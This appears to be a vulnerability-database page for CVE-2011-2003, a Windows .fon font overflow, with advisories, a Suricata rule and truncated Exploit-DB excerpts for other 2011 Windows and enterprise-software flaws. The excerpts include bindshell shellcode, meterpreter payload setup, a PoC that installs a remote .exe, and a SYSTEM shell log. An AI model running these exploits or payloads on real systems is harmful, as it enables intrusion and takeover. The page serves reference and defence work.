CVE-2011-2003
published 2011-10-12CVE-2011-2003: Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008…
PriorityP268critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
27.77%
97.8th percentile
Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .fon file, aka "Font Library File Buffer Overrun Vulnerability."
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect delivery or loading of crafted .fon font files, which trigger a buffer overflow in win32k.sys kernel-mode driver ↗
- →Monitor for unexpected crashes or exploitation activity originating from win32k.sys in kernel-mode, particularly when processing .fon files from remote/untrusted sources ↗
- ·PoC exploit targets Windows 7 32-bit only; behavior and exploitability may differ on other affected platforms listed in the CVE ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
ghsa6.5MEDIUM
vendor_redhat6.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rr89-f283-c7m9: Buffer overflow in win32k
ghsa_unreviewed·2022-05-13
CVE-2011-2003 [HIGH] CWE-119 GHSA-rr89-f283-c7m9: Buffer overflow in win32k
Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .fon file, aka "Font Library File Buffer Overrun Vulnerability."
GHSA
JBossWS vulnerable to uncontrolled recursion
ghsa·2022-05-13·CVSS 6.5
CVE-2011-1483 [MEDIUM] CWE-400 JBossWS vulnerable to uncontrolled recursion
JBossWS vulnerable to uncontrolled recursion
DOMUtils.java in org.jboss.ws:jbossws-common does not properly handle recursion during entity expansion, which allows remote attackers to cause a denial of service (memory and CPU consumption) via a crafted request containing an XML document with a DOCTYPE declaration and a large number of nested entity references, a similar issue to CVE-2003-1564.
Red Hat
JBossWS remote Denial of Service
vendor_redhat·2011-09-15·CVSS 6.5
CVE-2011-1483 [MEDIUM] JBossWS remote Denial of Service
JBossWS remote Denial of Service
wsf/common/DOMUtils.java in JBossWS Native in Red Hat JBoss Enterprise Application Platform 4.2.0.CP09, 4.3, and 5.1.1; JBoss Enterprise Portal Platform 4.3.CP06 and 5.1.1; JBoss Enterprise SOA Platform 4.2.CP05, 4.3.CP05, and 5.1.0; JBoss Communications Platform 1.2.11 and 5.1.1; JBoss Enterprise BRMS Platform 5.1.0; and JBoss Enterprise Web Platform 5.1.1 does not properly handle recursion during entity expansion, which allows remote attackers to cause a denial of service (memory and CPU consumption) via a crafted request containing an XML document with a DOCTYPE declaration and a large number of nested entity references, a similar issue to CVE-2003-1564.
Package: Security (Red Hat JBoss BRMS 5) - Affected
Red Hat
ruby: Properly initialize the random number generator when forking new process
vendor_redhat·2011-07-02·CVSS 5.0
CVE-2011-2686 [MEDIUM] ruby: Properly initialize the random number generator when forking new process
ruby: Properly initialize the random number generator when forking new process
Ruby before 1.8.7-p352 does not reset the random seed upon forking, which makes it easier for context-dependent attackers to predict the values of random numbers by leveraging knowledge of the number sequence obtained in a different child process, a related issue to CVE-2003-0900. NOTE: this issue exists because of a regression during Ruby 1.8.6 development.
Package: ruby (Red Hat Enterprise Linux 4) - Affected
Package: ruby (Red Hat Enterprise Linux 5) - Affected
Package: ruby (Red Hat Enterprise Linux 6) - Affected
Red Hat
ruby: Properly initialize the random number generator when forking new process
vendor_redhat·2011-07-02·CVSS 5.0
CVE-2011-3009 [MEDIUM] ruby: Properly initialize the random number generator when forking new process
ruby: Properly initialize the random number generator when forking new process
Ruby before 1.8.6-p114 does not reset the random seed upon forking, which makes it easier for context-dependent attackers to predict the values of random numbers by leveraging knowledge of the number sequence obtained in a different child process, a related issue to CVE-2003-0900.
Statement: The Red Hat Security Response Team has rated this issue as having low security impact, a future update may address this flaw in Red Hat Enterprise Linux 4 and 5.
Red Hat
jabberd: DoS via the XML "billion laughs attack"
vendor_redhat·2011-05-31·CVSS 6.5
CVE-2011-1755 [MEDIUM] jabberd: DoS via the XML "billion laughs attack"
jabberd: DoS via the XML "billion laughs attack"
jabberd2 before 2.2.14 does not properly detect recursion during entity expansion, which allows remote attackers to cause a denial of service (memory and CPU consumption) via a crafted XML document containing a large number of nested entity references, a similar issue to CVE-2003-1564.
Statement: Vulnerable. This issue has been addressed in Red Hat Network Satellite Server v 5.4.1 via RHSA-2011:0882 https://rhn.redhat.com/errata/RHSA-2011-0882.html and in Red Hat Network Proxy Server v5.4.1 via RHSA-2011:0881 https://rhn.redhat.com/errata/RHSA-2011-0881.html. This issue is not planned
to be fixed in Red Hat Network Satellite Server versions 5.0.2, 5.1.1, 5.2.1, 5.3.0 and not planned to be fixed in Red Hat Network Proxy Server versions 5.0.
Suricata
ET WEB_CLIENT Microsoft Visio 2003 mfc71enu.dll DLL Loading Arbitrary Code Execution Attempt
suricata·2011-07-27
CVE-2010-3148 ET WEB_CLIENT Microsoft Visio 2003 mfc71enu.dll DLL Loading Arbitrary Code Execution Attempt
ET WEB_CLIENT Microsoft Visio 2003 mfc71enu.dll DLL Loading Arbitrary Code Execution Attempt
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET WEB_CLIENT Microsoft Visio 2003 mfc71enu.dll DLL Loading Arbitrary Code Execution Attempt"; flow:established,to_server; http.uri; content:"/mfc71"; nocase; pcre:"/^[a-z]{2,3}\.dll/Ri"; reference:url,tools.cisco.com/security/center/viewAlert.x?alertId=23601; reference:url,www.microsoft.com/technet/security/bulletin/MS11-055.mspx; reference:bid,42681; reference:cve,2010-3148; classtype:attempted-user; sid:2013322; rev:3; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2011_07_27, cve CVE_2010_3148, deployment Perimeter, confidence Medium, signature_severity Major, tag
Exploit-DB
Microsoft Windows (x86) - 'NDISTAPI' Local Privilege Escalation (MS11-062)
exploitdb·2016-10-24
CVE-2011-1974 Microsoft Windows (x86) - 'NDISTAPI' Local Privilege Escalation (MS11-062)
Microsoft Windows (x86) - 'NDISTAPI' Local Privilege Escalation (MS11-062)
---
/*
################################################################
# Exploit Title: Windows x86 (all versions) NDISTAPI privilege escalation (MS11-062)
# Date: 2016-10-24
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP Pro SP2 x64
# Windows Server 2003 SP2 x86
# Windows Server 2003 SP2 x64
# Windows Server 2003 SP2 Itanium-based Systems
# Supported Vulnerable Software:
# Windows XP SP3 x86
# Windows Server 2003 SP2 x86
# Tested Software:
# Windows XP Pro SP3 x86 EN [5.1.2600]
# Windows Server 2003 Ent SP2 EN [5.2.3790]
# CVE ID: 2011-1974
################################################################
# Vulnerability description:
# An elevation of privilege vulner
Exploit-DB
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
exploitdb·2016-10-18
CVE-2011-1249 Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
---
/*
################################################################
# Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046)
# Date: 2016-10-16
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP Pro SP2 x64
# Windows Server 2003 SP2 x86
# Windows Server 2003 SP2 x64
# Windows Server 2003 SP2 Itanium-based Systems
# Windows Vista SP1 x86
# Windows Vista SP2 x86
# Windows Vista SP1 x64
# Windows Vista SP2 x64
# Windows Server 2008 x86
# Windows Server 2008 SP2 x86
# Windows Server 2008 x64
# Windows Server 2008 SP2 x64
# Windows Server 2008 Itanium-based Systems
# Windows Server 2008 SP2 Itanium-based Systems
# Windows 7 x86
# Windows 7 SP1 x86
# Wi
Exploit-DB
HP Data Protector - CMD Install Service (Metasploit)
exploitdb·2013-08-02·CVSS 10.0
CVE-2011-0922 [CRITICAL] HP Data Protector - CMD Install Service (Metasploit)
HP Data Protector - CMD Install Service (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability
# Date: 2012-13-07
# Exploit Author: Ben Turner, Doug McLeod
# Vendor Homepage: www.hp.com
# Version: 6.10 & 6.11 & 6.20
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
require 'msf/core'
class Metasploit3 'HP Data Pro
Exploit-DB
Enterasys NetSight - 'nssyslogd.exe' Remote Buffer Overflow (Metasploit)
exploitdb·2013-01-04
CVE-2011-5227 Enterasys NetSight - 'nssyslogd.exe' Remote Buffer Overflow (Metasploit)
Enterasys NetSight - 'nssyslogd.exe' Remote Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'Enterasys NetSight nssyslogd.exe Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Enterasys NetSight. The
vulnerability exists in the Syslog service (nssylogd.exe) when parsing a specially
crafted PRIO from a syslog message. The module has been tested successfully on
Enterasys NetSight 4.0.1.34 over Windows XP SP3 and Windows 2003 SP2.
},
'Author' =>
[
'Jeremy Brown', # Vulnerability discovery
'rgod ', #
Exploit-DB
HP Data Protector Client - EXEC_CMD Remote Code Execution
exploitdb·2012-06-19·CVSS 10.0
CVE-2011-0922 [CRITICAL] HP Data Protector Client - EXEC_CMD Remote Code Execution
HP Data Protector Client - EXEC_CMD Remote Code Execution
---
#!/usr/bin/env python
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability
# Date: 2012-12-06
# Exploit Author: Ben Turner
# Vendor Homepage: www.hp.com
# Version: 6.11 & 6.20
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
import socket
import sys
import binascii
if len(sys.argv) != 4:
print ""
print "\033[0;31mUsage: ./hp_protector.py \033[0m"
print ""
print "\033[0;32mMake sure you create a meterpreter payload and a share with the following \\\\\\Omniback\\i386\\installservice.exe\033[0m"
print
Exploit-DB
SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection
exploitdb·2012-05-01
CVE-2012-2576 SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection
SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection
---
#!/usr/bin/python
######################################################################################
# Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit
# Date: May 2nd 2012
# Author: muts
# Version: SolarWinds Storage Manager 5.1.0
# Tested on: Windows 2003
# Archive Url : http://www.offensive-security.com/0day/solarshell.txt
######################################################################################
# Discovered by Digital Defence - DDIVRT-2011-39
######################################################################################
import urllib, urllib2, cookielib
import sys
import random
print "\n[*] Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Explo
Exploit-DB
LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion
exploitdb·2012-03-19
CVE-2012-1196 LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion
LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion
---
LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server WSVulnerabilityCore.dll
SetTaskLogByFile() Remote Arbitrary File Deletion Vulnerability
Tested against: Microsoft Windows Server 2003 r2 sp2
Software home page: http://www.landesk.com/lenovo/thinkmanagement-console.aspx
Download url: http://www.landesk.com/downloads/lenovo/50.aspx
Files tested:
ThinkManagement9.0.2.exe
LD90-SP2-MCP_CONS-2011-0428.exe
LD90-SP2-MCP_SD-2011-0428.exe
ThinkManagementConsole9.0.3_b28.zip
Instrunctions were to install 9.0.2, then apply two patches, finally to install 9.0.3
Background:
The mentioned product creates various virtual directories on IIS.
Among them the 'WSVulnerabilityCore' one.
Without prior authenticatio
Exploit-DB
LANDesk Lenovo ThinkManagement Suite 9.0.3 - Core Server Remote Code Execution
exploitdb·2012-03-19
CVE-2012-1195 LANDesk Lenovo ThinkManagement Suite 9.0.3 - Core Server Remote Code Execution
LANDesk Lenovo ThinkManagement Suite 9.0.3 - Core Server Remote Code Execution
---
LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server AMTConfig.Business.dll
RunAMTCommand Remote Code Execution Vulnerability
Tested against: Microsoft Windows Server 2003 r2 sp2
Software home page: http://www.landesk.com/lenovo/thinkmanagement-console.aspx
Download url: http://www.landesk.com/downloads/lenovo/50.aspx
Files tested:
ThinkManagement9.0.2.exe
LD90-SP2-MCP_CONS-2011-0428.exe
LD90-SP2-MCP_SD-2011-0428.exe
ThinkManagementConsole9.0.3_b28.zip
Instrunctions were to install 9.0.2, then apply two patches, finally to install 9.0.3
Background:
The mentioned product creates various virtual directories on IIS.
Among them the 'core.anonymous' one inside the 'landesk' tree.
Without prior authentic
Exploit-DB
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
exploitdb·2011-11-30·CVSS 7.8
CVE-2011-2005 [HIGH] Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
---
################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: [email protected] - Matteo Memelli ########
######### Spaghetti & Pwnsauce ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com ########
######### ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ########
######### for helping out! ########
######### ########
######### To my Master Shifu muts: ########
######### "So that's it, I just need inner peace?" ;) ########
######### ########
######### Exploit tested on the following 32bits systems: ########
######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng
Exploit-DB
VMware - Update Manager Directory Traversal
exploitdb·2011-11-21·CVSS 5.0
CVE-2011-4404 [MEDIUM] VMware - Update Manager Directory Traversal
VMware - Update Manager Directory Traversal
---
# Exploit Title:VMware Update Manager Directory Traversal
# Date:18/11/2011
# Author: Alexey Sintsov
# Software Link: http://www.vmware.com/
# Version:2.0.2
# Tested on: Windows 2003 / vCenter Update Manager 4.1 U1
# CVE : CVE-2011-4404
DSECRG-11-042 VMware Update Manager - Directory Traversal
Application: VMware Update Manager
Versions Affected: vCenter Update Manager 4.1 prior to Update 2, vCenter Update Manager 4.0 prior to Update 4
Vendor URL: http://vmware.com
Bugs: Directory Traversal File Read
CVE: CVE-2011-4404
CVSS2: 7.8
Exploits: YES
Reported: 06.06.2010
Vendor response: 06.06.2010
Date of Public Advisory: 18.11.2011
Authors: Alexey Sintsov
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com)
Description
Di
Exploit-DB
NJStar Communicator 3.00 - MiniSMTP Server Remote (Metasploit)
exploitdb·2011-10-31
CVE-2011-4040 NJStar Communicator 3.00 - MiniSMTP Server Remote (Metasploit)
NJStar Communicator 3.00 - MiniSMTP Server Remote (Metasploit)
---
##
# Exploit Title: NJStar Communicator 3.00 MiniSMTP Server Remote Exploit
# Date: 10/31/2011
# Author: Dillon Beresford
# Twitter: https://twitter.com/#!/D1N
# Software Link: http://www.njstar.com/download/njcom.exe
# Version: 3.00 and prior
# Build: 11818 and prior
# Tested on: Windows XP SP3/SP2/SP1 and Windows Server 2003 SP0
# CVE : NONE
# Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran,
# manils, d0tslash, mublix, halsten, and everyone at AHA!
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
Exploit-DB
Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun (PoC) (MS11-077)
exploitdb·2011-10-13·CVSS 9.3
CVE-2011-2003 [CRITICAL] Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun (PoC) (MS11-077)
Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun (PoC) (MS11-077)
---
# Exploit Title: MS11-077 .fon buffer overrun kernel-mode drivers exploit
# Google Dork: [if relevant] �(we will automatically add these to the GHDB)
# Date: 10/12/2011
# Author: Byoungyoung Lee, http://www.cc.gatech.edu/~blee303/
# Software Link:
# Version: Windows 7 32bit, fully patched until Sep. 2011
# Tested on: Windows 7 32bit
# CVE : CVE-2011-2003
Exploit is downloadable from:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17978.tar.gz (my.fon.tar.gz)
http://exploitshop.wordpress.com/2011/10/12/ms11-077-vulnerabilities-in-windows-kernel-mode-drivers-could-allow-remote-code-execution-2567053/
Byoungyoung
Exploit-DB
Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
exploitdb·2011-09-22
CVE-2011-3493 Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
---
#!/usr/bin/python
#
# Cogent Datahub > @net__ninja || @luigi_auriemma
# example usage:
# [mr_me@neptune cognet]$ ./cognet_overflow.py 192.168.114.130
#
# -----------------------------------------------------
# ------ Cogent Datahub Unicode Overflow Exploit ------
# ------------- Found by Luigi Auriemma ---------------
# --------- SYSTEM exploit by Steven Seeley -----------
#
# (+) Sending overflow...
# (+) Getting shell..
# Connection to 192.168.114.130 1337 port [tcp/menandmice-dns] succeeded!
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>whoami
# whoami
# nt authority\system
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaste
Exploit-DB
Blue Coat Reporter - Directory Traversal
exploitdb·2011-09-22
CVE-2011-5127 Blue Coat Reporter - Directory Traversal
Blue Coat Reporter - Directory Traversal
---
# Exploit Title: Blue Coat Reporter Unauthenticated Directory Traversal
# Author: nitr0us / http://twitter.com/nitr0usmx
# Software Link: http://www.bluecoat.com/products/reporter
# Version: 9.2.x - 9.1.x
# Tested on: Windows Server 2003 Standard
Blue Coat Reporter Unauthenticated Directory Traversal
### PUBLIC RELEASE ###
My gift to Ekoparty Security Conference 2011 @ Argentina
What a great event!
21/Sept/2011
### PUBLIC RELEASE ###
Vulnerability Information
Vendor: Blue Coat Systems, Inc. (NASDAQ: BCSI) - http://www.bluecoat.com
Product: Blue Coat Reporter - http://www.bluecoat.com/products/reporter
Versions: 9.2.x - 9.1.x
Platform: Windows (the Linux installation is not vulnerable)
Tested on: Blue Coat Reporter 9.2.3 on Windows Server 2
Exploit-DB
CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities
exploitdb·2011-07-26
CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities
CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities
---
# Exploit Title:CA ARCserve D2D r15 GWT RPC Request Auth Bypass / Credentials Disclosure and Commands Execution
# Google Dork: /
# Date: 25 July 2011
# Author: rgod
# Software Link: /
# Version: r15.0
# Tested on: Microsoft Windows Server 2003 r2 sp2
# CVE : none
Administrator
Password -> MY_PASSWORD
A remote attacker could then login to the affected application
then execute arbitrary commands with Administrator group privileges
in the following way:
Browse Backup settings;
Click Advanced tab;
Check "Run a command before backup is started";
Fill the white field with the desired command, ex. cmd /c start calc ;
Fill the credentials fields with the gained username and password
(you can use the same you had before);
Select an exis
Exploit-DB
HP Data Protector 6.11 - Remote Buffer Overflow (DEP Bypass)
exploitdb·2011-07-02
CVE-2011-1865 HP Data Protector 6.11 - Remote Buffer Overflow (DEP Bypass)
HP Data Protector 6.11 - Remote Buffer Overflow (DEP Bypass)
---
#!/usr/bin/python
# HP Data Protector 6.11 Remote Buffer Overflow
# Tested on Windows 2003 R2 + DEP Enabled
# Authors: muts & dookie
# Reference: http://www.exploit-db.com/exploits/17458/
# Reference: http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
# http://www.offensive-security.com/0day/hp-dataprotector.py.txt
import struct, socket, sys
target = sys.argv[1]
# bindshell - port 4444
shellcode = ("\xbf\x83\x75\x7f\xdd\xdb\xc8\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x56\x31\x7e\x13\x03\x7e\x13\x83\xee\x7f\x97\x8a\x21\x97\xd1"
"\x75\xda\x67\x82\xfc\x3f\x56\x90\x9b\x34\xca\x24\xef\x19\xe6"
"\xcf\xbd\x89\x7d\xbd\x69\xbd\x36\x08\x4c\xf0\xc7\xbc\x50\x5e"
"\x0b\xde\x2c\x9d\x5f\x00\x0c\x6e\x92\x41\x49\x93
Exploit-DB
Oracle HTTP Server - Cross-Site Scripting Header Injection
exploitdb·2011-06-13·CVSS 4.3
CVE-2006-3918 [MEDIUM] Oracle HTTP Server - Cross-Site Scripting Header Injection
Oracle HTTP Server - Cross-Site Scripting Header Injection
---
Oracle HTTP Server XSS Header Injection
# Attack Pattern ID : CAPEC-86
# CWE ID : CI-79
# OWASP IDs : A1-Injections, A2-Cross Site Scripting (XSS)
# CVE ID : not yet
# Related CVEs : CVE-2006-3918, CVE-2007-0275
# A.K.A : Unfiltered Header Injection
# Product Type : Application
# Vendor : Oracle Corporation
# Product : Oracle HTTP Server for Oracle Application Server 10g
# Vulnerable Versions: 10.1.2.0.2
# Probably Vulnerable: (not tested) 10.1.2.0.0, 9.0.4.3.0, 9.0.4.2.0, 9.0.4.1.0, 9.0.4.0.0
# Severity : Medium
# Tested on : Linux, Windows Server 2003
# Download link : http://www.oracle.com/technetwork/middleware/ias/downloads/101201se-090616.html
# Date : 12/06/2011
# Google Dork : allintitle:"Oracle HTTP Server -"
[-] Cre
Exploit-DB
HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution
exploitdb·2011-05-29·CVSS 10.0
CVE-2011-0922 [CRITICAL] HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution
HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution
---
# Exploit Title: HP Data Protector Cliet EXEC_SETUP Remote Code Execution Vulnerability PoC (ZDI-11-056)
# Date: 2011-05-29
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 6.11
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
#
# The following PoC instructs an HP Data Protector Client to download and install an .exe file. It tries to get the file
# from a share (\\pwn2003se.home.it) and if it fails it tries to access the same file via HTTP. To get the PoC working with
# this payload share a malicious file via HTTP
Exploit-DB
HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution
exploitdb·2011-05-28·CVSS 10.0
CVE-2011-0923 [CRITICAL] HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution
HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution
---
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability PoC (ZDI-11-055)
# Date: 2011-05-28
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 6.11
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0923
# Notes: ZDI-11-055
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
#
# Greetz to all the Exploit-DB Dev Team.
import socket
import sys
if len(sys.argv) != 3:
print "Usage: ./ZDI-11-055.py "
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
# The following PoC takes advantage of a Directory Path Traversal to execute ipconfig.exe on the remote host.
# Tw
Exploit-DB
EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)
exploitdb·2011-04-27
CVE-2010-0620 EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)
EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)
---
##
# $Id: emc_homebase_exec.rb 12458 2011-04-27 20:29:27Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'EMC HomeBase Server Directory Traversal Remote Code Execution',
'Description' => %q{
This module exploits a directory traversal and remote code execution
flaw in EMC HomeBase Server 6.3.0.
Note: This module has only been tested against Windows XP SP3 and Windows 2003 SP2
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 12458
Exploit-DB
Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)
exploitdb·2011-04-16
CVE-2009-0565 Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)
Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)
---
##
# $Id: ms09-027 10477 2011-04-13 11:59:02Z mc $
##
##
# This file is not part of the Metasploit Framework and may not be subject to
# redistribution and commercial restrictions.
##
#TODO some testing to find the real banned characters and maxlen
# add those parameters to the .rb file
# drop in appropriate directory
# ulimit -s 100000 is required to run this exploit appropriately
require 'msf/core'
#require 'zlib'
class Metasploit3 'MS Word Record Parsing Buffer Overflow(MS-09-027)',
'Description' => %q{
MS Word Record Parsing Buffer Overflow(MS-09-027)
Vulnerble application MS office 2003
Tested on XP SP2 - MS Ofice 2003 v. 11.5604.5606
Bug Found By Wushi of team509
Greets Villy, Abhishek Lyall and A
Exploit-DB
.NET Runtime Optimization Service - Local Privilege Escalation
exploitdb·2011-03-08
.NET Runtime Optimization Service - Local Privilege Escalation
.NET Runtime Optimization Service - Local Privilege Escalation
---
/*
# Exploit Title: .NET Runtime Optimization Service Privilege Escalation
# Date: 03-07-2011
# Author: XenoMuta
# Version: v2.0.50727
# Tested on: Windows XP (sp3), 2003 R2, 7
# CVE : n/a
_ __ __ ___ __
| |/ /__ ____ ____ / |/ /_ __/ /_____ _
| / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
/ / __/ / / / /_/ / / / / /_/ / /_/ /_/ /
/_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/
xenomuta [at] tuxfamily.org
xenomuta [at] gmail.com
http://xenomuta.tuxfamily.org/ - Methylxantina 256mg
This one's a no-brainer, plain simple:
This service's EXE file can be overwritten by any non-admin domain user
and local power users ( wich are the default permissions set ).
This exploit compiles to a service that uses the original service's id.
Exploit-DB
Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
exploitdb·2011-03-04
CVE-2010-3333 Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
---
##
# $Id: ms10_087_rtf_pfragments_bof.rb 11875 2011-03-04 08:39:48Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',
'Description' => %q{
This module exploits a stack-based buffer overflow in the handling of the
'pFragments' shape property within the Microsoft Word RTF parser. All versions
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
MS10-087
Exploit-DB
Microsoft Windows Server 2003 - AD BROWSER ELECTION Remote Heap Overflow
exploitdb·2011-02-14
CVE-2011-0654 Microsoft Windows Server 2003 - AD BROWSER ELECTION Remote Heap Overflow
Microsoft Windows Server 2003 - AD BROWSER ELECTION Remote Heap Overflow
---
####################################################################################
#MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow
#Release date: 2011-02-14
#Author: Cupidon-3005
#Greet: Winny Thomas, Laurent Gaffie, h07
#Bug: Heap Overflow
#Remote Exploitability: Unlikely
#Local Exploitability: Likely
#Context: Broadcast, Pre-Auth
#####################################################################################
#Mrxsmb.sys, around BowserWriteErrorLog+0x175, while trying to copy 1go from ESI to EDI ...
#Code will look something like this:
#if ((Len + 1) * sizeof(WCHAR)) > TotalBufferSize) { Len = TotalSize/sizeof(WCHAR) - 1; }
#-1 causes Len to go 0xFFFFFFFF
#Feel free to reuse th
Exploit-DB
Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)
exploitdb·2011-01-11
CVE-2003-0352 Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)
Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)
---
##
# $Id: ms03_026_dcom.rb 11545 2011-01-11 17:56:27Z jduck $
##
##
